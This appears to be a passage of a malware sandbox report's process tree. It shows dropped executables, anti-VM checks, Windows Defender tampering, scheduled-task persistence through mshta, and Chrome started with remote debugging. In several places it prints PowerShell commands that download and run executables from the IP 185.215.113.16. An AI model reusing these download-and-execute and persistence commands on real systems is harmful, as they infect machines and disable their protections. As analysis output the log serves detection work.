-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:86⤵PID:2776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1508 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:26⤵PID:1692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2192 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:1952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1308 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:86⤵PID:1740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3640 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:86⤵PID:1920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1328 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:86⤵PID:2112
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 5564⤵
- Loads dropped DLL
- Program crash
PID:2756
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2816
-
-
C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"3⤵
- Executes dropped EXE
PID:1728
-
-
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:440
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:2372
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:2068
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:2968
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2536
-
-
C:\Users\Admin\AppData\Local\Temp\1088667001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1088667001\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2712 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3048 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 5646⤵
- Loads dropped DLL
- Program crash
PID:2052
-
-
-
C:\Users\Admin\AppData\Local\Temp\10009190101\6610a02fea.exe"C:\Users\Admin\AppData\Local\Temp\10009190101\6610a02fea.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2616
-
-
C:\Users\Admin\AppData\Local\Temp\10009200101\b48baaab9c.exe"C:\Users\Admin\AppData\Local\Temp\10009200101\b48baaab9c.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3484 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4016
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088694101\221457afdd.exe"C:\Users\Admin\AppData\Local\Temp\1088694101\221457afdd.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1072 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn EDMivma1TWu /tr "mshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:1228 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn EDMivma1TWu /tr "mshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:288
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296 -
C:\Users\Admin\AppData\Local\TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE"C:\Users\Admin\AppData\Local\TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1088695021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:2324 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1088695021\am_no.cmd" any_word4⤵PID:612
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:2876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "onvgcmaGhjM" /tr "mshta \"C:\Temp\tolON6waI.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2628
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\tolON6waI.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2148
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088713001\8f9cdc126e.exe"C:\Users\Admin\AppData\Local\Temp\1088713001\8f9cdc126e.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1812 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:888 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7789758,0x7fef7789768,0x7fef77897785⤵PID:2108
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:25⤵PID:2096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1020 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:85⤵PID:2340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1492 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:85⤵PID:2808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2204 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2216 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1096 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:25⤵PID:2616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1864 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3560 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:85⤵PID:3128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3692 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:85⤵PID:3144
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
PID:3616
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 9724⤵
- Program crash
PID:860
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088714001\f1c548477b.exe"C:\Users\Admin\AppData\Local\Temp\1088714001\f1c548477b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2560
-
-
C:\Users\Admin\AppData\Local\Temp\1088715001\3a3b5fb167.exe"C:\Users\Admin\AppData\Local\Temp\1088715001\3a3b5fb167.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2416
-
-
C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 5604⤵
- Program crash
PID:1936
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:900 -
C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 5044⤵
- Program crash
PID:2240
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088718001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1088718001\dzvh4HC.exe"3⤵
- Executes dropped EXE
PID:3392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1088719041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3796 -
C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3832 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2904 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7639758,0x7fef7639768,0x7fef76397786⤵PID:1912
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:3396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:26⤵PID:1696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:86⤵PID:1340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:86⤵PID:3240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2248 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2352
-
-
